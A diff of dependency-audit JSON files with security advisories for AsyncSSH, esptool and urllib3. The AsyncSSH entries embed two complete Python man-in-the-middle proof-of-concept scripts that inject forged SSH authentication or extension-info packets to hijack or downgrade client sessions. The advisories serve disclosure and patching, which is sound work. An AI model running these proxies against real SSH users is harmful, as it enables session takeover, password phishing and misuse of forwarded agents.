+ "modified": "2023-11-09T18:49:39Z",
+ "published": "2023-11-09T18:35:14Z",
+ "schema_version": "1.6.0",
+ "id": "GHSA-c35q-ffpf-5qpm",
+ "aliases": [
+ "CVE-2023-46446"
+ ],
+ "summary": "AsyncSSH Rogue Session Attack",
+ "details": "### Summary\n\nAn issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.\n\n### Details\n\nThe rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker's account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user's session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker's position to a MitM at the application layer and enabling perfect shell emulation.\n\nThe attacks work by the attacker injecting a chosen authentication request before the client's NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.\n\n### PoC\n\n\n AsyncSSH 2.14.0 client (simple_client.py example) connecting to AsyncSSH 2.14.0 server (simple_server.py example)
\n\n ```python\n #!/usr/bin/python3\n import socket\n from threading import Thread\n from binascii import unhexlify\n from time import sleep\n \n ##################################################################################\n ## Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ##\n ## ##\n ## Variant: Unmodified variant (EXT_INFO by client required) ##\n ## ##\n ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ##\n ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ##\n ## ##\n ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##\n ##################################################################################\n \n # IP and port for the TCP proxy to bind to\n PROXY_IP = '127.0.0.1'\n PROXY_PORT = 2222\n \n # IP and port of the server\n SERVER_IP = '127.0.0.1'\n SERVER_PORT = 22\n \n # Length of the individual messages\n NEW_KEYS_LENGTH = 16\n CLIENT_EXT_INFO_LENGTH = 60\n # Additional data sent by the client after NEW_KEYS (excluding EXT_INFO)\n ADDITIONAL_CLIENT_DATA_LENGTH = 60\n \n newkeys_payload = b'\\x00\\x00\\x00\\x0c\\x0a\\x15'\n def contains_newkeys(data):\n return newkeys_payload in data\n \n rogue_userauth_request = unhexlify('000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000')\n def insert_rogue_authentication_request(data):\n newkeys_index = data.index(newkeys_payload)\n # Insert rogue authentication request and remove SSH_MSG_EXT_INFO\n return data[:newkeys_index] + rogue_userauth_request + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH:]\n \n def forward_client_to_server(client_socket, server_socket):\n delay_next = False\n try:\n while True:\n client_data = client_socket.recv(4096)\n if delay_next:\n delay_next = False\n sleep(0.25)\n if contains_newkeys(client_data):\n print(\"[+] SSH_MSG_NEWKEYS sent by client identified!\")\n if len(client_data) < NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH:\n print(\"[+] client_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!\")\n while len(client_data) < NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH:\n client_data += client_socket.recv(4096)\n print(f\"[d] Original client_data before modification: {client_data.hex()}\")\n client_data = insert_rogue_authentication_request(client_data)\n print(f\"[d] Modified client_data with rogue authentication request: {client_data.hex()}\")\n delay_next = True\n if len(client_data) == 0:\n break\n server_socket.send(client_data)\n except ConnectionResetError:\n print(\"[!] Client connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_client_to_server thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n def forward_server_to_client(client_socket, server_socket):\n try:\n while True:\n server_data = server_socket.recv(4096)\n if len(server_data) == 0:\n break\n client_socket.send(server_data)\n except ConnectionResetError:\n print(\"[!] Target connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_server_to_client thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n if __name__ == '__main__':\n print(\"--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---\")\n mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mitm_socket.bind((PROXY_IP, PROXY_PORT))\n mitm_socket.listen(5)\n \n print(f\"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...\")\n \n try:\n while True:\n client_socket, client_addr = mitm_socket.accept()\n print(f\"[+] Accepted connection from: {client_addr}\")\n print(f\"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.\")\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.connect((SERVER_IP, SERVER_PORT))\n print(\"[+] Spawning new forwarding threads to handle client connection.\")\n Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start()\n Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start()\n except KeyboardInterrupt:\n client_socket.close()\n server_socket.close()\n mitm_socket.close()\n ```\n \n\n### Impact\n\nThe impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection's security.\n",
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "asyncssh",
+ "purl": "pkg:pypi/asyncssh"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.14.1"
+ }
+ ]
+ }
+ ],
+ "versions": [
+ "0.8.1",
+ "0.8.2",
+ "0.8.3",
+ "0.8.4",
+ "0.9.0",
+ "0.9.1",
+ "0.9.2",
+ "1.0.0",
+ "1.0.1",
+ "1.1.0",
+ "1.1.1",
+ "1.10.0",
+ "1.10.1",
+ "1.11.0",
+ "1.11.1",
+ "1.12.0",
+ "1.12.1",
+ "1.12.2",
+ "1.13.0",
+ "1.13.1",
+ "1.13.2",
+ "1.13.3",
+ "1.14.0",
+ "1.15.0",
+ "1.15.1",
+ "1.16.0",
+ "1.16.1",
+ "1.17.0",
+ "1.17.1",
+ "1.18.0",
+ "1.2.0",
+ "1.2.1",
+ "1.3.0",
+ "1.3.1",
+ "1.3.2",
+ "1.4.0",
+ "1.4.1",
+ "1.5.0",
+ "1.5.1",
+ "1.5.2",
+ "1.5.3",
+ "1.5.4",
+ "1.5.5",
+ "1.5.6",
+ "1.6.0",
+ "1.6.1",
+ "1.6.2",
+ "1.7.1",
+ "1.7.2",
+ "1.7.3",
+ "1.8.0",
+ "1.8.1",
+ "1.9.0",
+ "2.0.0",
+ "2.0.1",
+ "2.1.0",
+ "2.10.0",
+ "2.10.1",
+ "2.11.0",
+ "2.12.0",
+ "2.13.0",
+ "2.13.1",
+ "2.13.2",
+ "2.14.0",
+ "2.2.0",
+ "2.2.1",
+ "2.3.0",
+ "2.4.0",
+ "2.4.1",
+ "2.4.2",
+ "2.5.0",
+ "2.6.0",
+ "2.7.0",
+ "2.7.1",
+ "2.7.2",
+ "2.8.0",
+ "2.8.1",
+ "2.9.0"
+ ],
+ "database_specific": {
+ "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-c35q-ffpf-5qpm/GHSA-c35q-ffpf-5qpm.json"
+ }
+ }
+ ],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/ronf/asyncssh/security/advisories/GHSA-c35q-ffpf-5qpm"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ronf/asyncssh/commit/83e43f5ea3470a8617fc388c72b062c7136efd7e"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/ronf/asyncssh"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-345",
+ "CWE-349",
+ "CWE-354",
+ "CWE-359"
+ ],
+ "github_reviewed": true,
+ "github_reviewed_at": "2023-11-09T18:35:14Z",
+ "nvd_published_at": null,
+ "severity": "HIGH"
+ }
+ },
+ {
+ "modified": "2023-11-09T18:49:20Z",
+ "published": "2023-11-09T18:34:53Z",
+ "schema_version": "1.6.0",
+ "id": "GHSA-cfc2-wr2v-gxm5",
+ "aliases": [
+ "CVE-2023-46445"
+ ],
+ "summary": "AsyncSSH Rogue Extension Negotiation",
+ "details": "### Summary\n\nAn issue in AsyncSSH v2.14.0 and earlier allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack.\n\n### Details\n\nThe rogue extension negotiation attack targets an AsyncSSH client connecting to any SSH server sending an extension info message. The attack exploits an implementation flaw in the AsyncSSH implementation to inject an extension info message chosen by the attacker and delete the original extension info message, effectively replacing it.\n\nA correct SSH implementation should not process an unauthenticated extension info message. However, the injected message is accepted due to flaws in AsyncSSH. AsyncSSH supports the server-sig-algs and global-requests-ok extensions. Hence, the attacker can downgrade the algorithm used for client authentication by meddling with the value of server-sig-algs (e.g. use of SHA-1 instead of SHA-2).\n\n### PoC\n\n\n AsyncSSH Client 2.14.0 (simple_client.py example) connecting to AsyncSSH Server 2.14.0 (simple_server.py example)
\n\n ```python\n #!/usr/bin/python3\n import socket\n from threading import Thread\n from binascii import unhexlify\n \n #####################################################################################\n ## Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ##\n ## ##\n ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ##\n ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ##\n ## ##\n ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##\n #####################################################################################\n \n # IP and port for the TCP proxy to bind to\n PROXY_IP = '127.0.0.1'\n PROXY_PORT = 2222\n \n # IP and port of the server\n SERVER_IP = '127.0.0.1'\n SERVER_PORT = 22\n \n # Length of the individual messages\n NEW_KEYS_LENGTH = 16\n SERVER_EXT_INFO_LENGTH = 676\n \n newkeys_payload = b'\\x00\\x00\\x00\\x0c\\x0a\\x15'\n def contains_newkeys(data):\n return newkeys_payload in data\n \n # Empty EXT_INFO here to keep things simple, but may also contain actual extensions like server-sig-algs\n rogue_ext_info = unhexlify('0000000C060700000000000000000000')\n def insert_rogue_ext_info(data):\n newkeys_index = data.index(newkeys_payload)\n # Insert rogue extension info and remove SSH_MSG_EXT_INFO\n return data[:newkeys_index] + rogue_ext_info + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:]\n \n def forward_client_to_server(client_socket, server_socket):\n try:\n while True:\n client_data = client_socket.recv(4096)\n if len(client_data) == 0:\n break\n server_socket.send(client_data)\n except ConnectionResetError:\n print(\"[!] Client connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_client_to_server thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n def forward_server_to_client(client_socket, server_socket):\n try:\n while True:\n server_data = server_socket.recv(4096)\n if contains_newkeys(server_data):\n print(\"[+] SSH_MSG_NEWKEYS sent by server identified!\")\n if len(server_data) < NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:\n print(\"[+] server_data does not contain all messages sent by the server yet. Receiving additional bytes until we have 692 bytes buffered!\")\n while len(server_data) < NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:\n server_data += server_socket.recv(4096)\n print(f\"[d] Original server_data before modification: {server_data.hex()}\")\n server_data = insert_rogue_ext_info(server_data)\n print(f\"[d] Modified server_data with rogue extension info: {server_data.hex()}\")\n if len(server_data) == 0:\n break\n client_socket.send(server_data)\n except ConnectionResetError:\n print(\"[!] Target connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_server_to_client thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n if __name__ == '__main__':\n print(\"--- Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ---\")\n mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mitm_socket.bind((PROXY_IP, PROXY_PORT))\n mitm_socket.listen(5)\n \n print(f\"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...\")\n \n try:\n while True:\n client_socket, client_addr = mitm_socket.accept()\n print(f\"[+] Accepted connection from: {client_addr}\")\n print(f\"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.\")\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.connect((SERVER_IP, SERVER_PORT))\n print(\"[+] Spawning new forwarding threads to handle client connection.\")\n Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start()\n Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start()\n except KeyboardInterrupt:\n client_socket.close()\n server_socket.close()\n mitm_socket.close()\n ```\n \n\n### Impact\n\nAlgorithm downgrade during user authentication.",
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "asyncssh",
+ "purl": "pkg:pypi/asyncssh"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.14.1"
+ }
+ ]
+ }
+ ],
+ "versions": [
+ "0.8.1",
+ "0.8.2",
+ "0.8.3",
+ "0.8.4",
+ "0.9.0",
+ "0.9.1",
+ "0.9.2",
+ "1.0.0",
+ "1.0.1",
+ "1.1.0",
+ "1.1.1",
+ "1.10.0",
+ "1.10.1",
+ "1.11.0",
+ "1.11.1",
+ "1.12.0",
+ "1.12.1",
+ "1.12.2",
+ "1.13.0",
+ "1.13.1",
+ "1.13.2",
+ "1.13.3",
+ "1.14.0",
+ "1.15.0",
+ "1.15.1",
+ "1.16.0",
+ "1.16.1",
+ "1.17.0",
+ "1.17.1",
+ "1.18.0",
+ "1.2.0",
+ "1.2.1",
+ "1.3.0",
+ "1.3.1",
+ "1.3.2",
+ "1.4.0",
+ "1.4.1",
+ "1.5.0",
+ "1.5.1",
+ "1.5.2",
+ "1.5.3",
+ "1.5.4",
+ "1.5.5",
+ "1.5.6",
+ "1.6.0",
+ "1.6.1",
+ "1.6.2",
+ "1.7.1",
+ "1.7.2",
+ "1.7.3",
+ "1.8.0",
+ "1.8.1",
+ "1.9.0",
+ "2.0.0",
+ "2.0.1",
+ "2.1.0",
+ "2.10.0",
+ "2.10.1",
+ "2.11.0",
+ "2.12.0",
+ "2.13.0",
+ "2.13.1",
+ "2.13.2",
+ "2.14.0",
+ "2.2.0",
+ "2.2.1",
+ "2.3.0",
+ "2.4.0",
+ "2.4.1",
+ "2.4.2",
+ "2.5.0",
+ "2.6.0",
+ "2.7.0",
+ "2.7.1",
+ "2.7.2",
+ "2.8.0",
+ "2.8.1",
+ "2.9.0"
+ ],
+ "database_specific": {
+ "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-cfc2-wr2v-gxm5/GHSA-cfc2-wr2v-gxm5.json"
+ }
+ }
+ ],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/ronf/asyncssh/security/advisories/GHSA-cfc2-wr2v-gxm5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ronf/asyncssh/commit/83e43f5ea3470a8617fc388c72b062c7136efd7e"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/ronf/asyncssh"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-345",
+ "CWE-349",
+ "CWE-354"
+ ],
+ "github_reviewed": true,
+ "github_reviewed_at": "2023-11-09T18:34:53Z",
+ "nvd_published_at": null,
+ "severity": "MODERATE"
+ }
+ }
+ ],
+ "groups": [
+ {
+ "ids": [
+ "GHSA-c35q-ffpf-5qpm"
+ ]
+ },
+ {
+ "ids": [
+ "GHSA-cfc2-wr2v-gxm5"
+ ]
+ }
+ ]
+ },
{
"package": {
"name": "configobj",
diff --git a/audits/esphome-requirements.audit.json b/audits/esphome-requirements.audit.json
new file mode 100644
index 00000000..f6c938e7
--- /dev/null
+++ b/audits/esphome-requirements.audit.json
@@ -0,0 +1,122 @@
+[
+ {
+ "package": {
+ "name": "esptool",
+ "version": "4.6.2",
+ "ecosystem": "PyPI",
+ "commit": ""
+ },
+ "vulnerabilities": [
+ {
+ "modified": "2023-11-09T22:26:48Z",
+ "published": "2023-11-09T18:34:55Z",
+ "schema_version": "1.6.0",
+ "id": "GHSA-3f38-96qm-r3fw",
+ "aliases": [
+ "CVE-2023-46894"
+ ],
+ "summary": "esptool allows attackers to view sensitive information via weak cryptographic algorithm",
+ "details": "An issue discovered in esptool 4.6.2 allows attackers to view sensitive information via weak cryptographic algorithm.",
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "esptool",
+ "purl": "pkg:pypi/esptool"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "4.6.2"
+ }
+ ]
+ }
+ ],
+ "versions": [
+ "1.0.0",
+ "1.0.1",
+ "1.1",
+ "1.2",
+ "1.2.1",
+ "1.3",
+ "2.0",
+ "2.0.1",
+ "2.1",
+ "2.2",
+ "2.2.1",
+ "2.3",
+ "2.3.1",
+ "2.4.0",
+ "2.4.1",
+ "2.5.0",
+ "2.5.1",
+ "2.6",
+ "2.7",
+ "2.8",
+ "3.0",
+ "3.1",
+ "3.2",
+ "3.3",
+ "3.3.1",
+ "3.3.2",
+ "3.3.3",
+ "4.0",
+ "4.0.1",
+ "4.1",
+ "4.2",
+ "4.2.1",
+ "4.3",
+ "4.4",
+ "4.5",
+ "4.5.1",
+ "4.5.dev0",
+ "4.5.dev1",
+ "4.5.dev2",
+ "4.5.dev3",
+ "4.6",
+ "4.6.1",
+ "4.6.2",
+ "4.6.dev1"
+ ],
+ "database_specific": {
+ "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-3f38-96qm-r3fw/GHSA-3f38-96qm-r3fw.json"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46894"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/espressif/esptool/issues/926"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/espressif/esptool"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "github_reviewed": true,
+ "github_reviewed_at": "2023-11-09T22:10:33Z",
+ "nvd_published_at": "2023-11-09T16:15:34Z",
+ "severity": "MODERATE"
+ }
+ }
+ ],
+ "groups": [
+ {
+ "ids": [
+ "GHSA-3f38-96qm-r3fw"
+ ]
+ }
+ ]
+ }
+]
\ No newline at end of file
diff --git a/audits/openai-whisper-requirements.audit.json b/audits/openai-whisper-requirements.audit.json
deleted file mode 100644
index cbcc5a53..00000000
--- a/audits/openai-whisper-requirements.audit.json
+++ /dev/null
@@ -1,785 +0,0 @@
-[
- {
- "package": {
- "name": "urllib3",
- "version": "2.0.4",
- "ecosystem": "PyPI",
- "commit": ""
- },
- "vulnerabilities": [
- {
- "modified": "2023-11-06T16:43:34Z",
- "published": "2023-10-17T20:15:25Z",
- "schema_version": "1.6.0",
- "id": "GHSA-g4mx-q9vg-27p4",
- "aliases": [
- "CVE-2023-45803"
- ],
- "summary": "urllib3's request body not stripped after redirect from 303 status changes request method to GET",
- "details": "urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers.\n\nFrom [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get):\n\n> A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported.\n\n## Affected usages\n\nBecause the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable.\n\nBoth of the following conditions must be true to be affected by this vulnerability:\n\n* If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON)\n* The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised.\n\n## Remediation\n\nYou can remediate this vulnerability with any of the following steps:\n\n* Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7)\n* Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`.\n* Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body.\n",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.7"
- }
- ]
- }
- ],
- "versions": [
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5",
- "2.0.6"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g4mx-q9vg-27p4/GHSA-g4mx-q9vg-27p4.json"
- }
- },
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.18"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.17",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g4mx-q9vg-27p4/GHSA-g4mx-q9vg-27p4.json"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "references": [
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"
- },
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36"
- },
- {
- "type": "WEB",
- "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"
- },
- {
- "type": "PACKAGE",
- "url": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/"
- },
- {
- "type": "WEB",
- "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "github_reviewed": true,
- "github_reviewed_at": "2023-10-17T20:15:25Z",
- "nvd_published_at": "2023-10-17T20:15:10Z",
- "severity": "MODERATE"
- }
- },
- {
- "modified": "2023-11-04T00:48:52Z",
- "published": "2023-10-02T23:27:05Z",
- "schema_version": "1.6.0",
- "id": "GHSA-v845-jxx5-vc9f",
- "aliases": [
- "CVE-2023-43804"
- ],
- "summary": "`Cookie` HTTP header isn't stripped on cross-origin redirects",
- "details": "urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly.\n\nUsers **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach.\n\n## Affected usages\n\nWe believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:\n\n* Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6)\n* Using the `Cookie` header on requests, which is mostly typical for impersonating a browser.\n* Not disabling HTTP redirects\n* Either not using HTTPS or for the origin server to redirect to a malicious origin.\n\n## Remediation\n\n* Upgrading to at least urllib3 v1.26.17 or v2.0.6\n* Disabling HTTP redirects using `redirects=False` when sending requests.\n* Not using the `Cookie` header.",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.6"
- }
- ]
- }
- ],
- "versions": [
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-v845-jxx5-vc9f/GHSA-v845-jxx5-vc9f.json"
- }
- },
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.17"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-v845-jxx5-vc9f/GHSA-v845-jxx5-vc9f.json"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
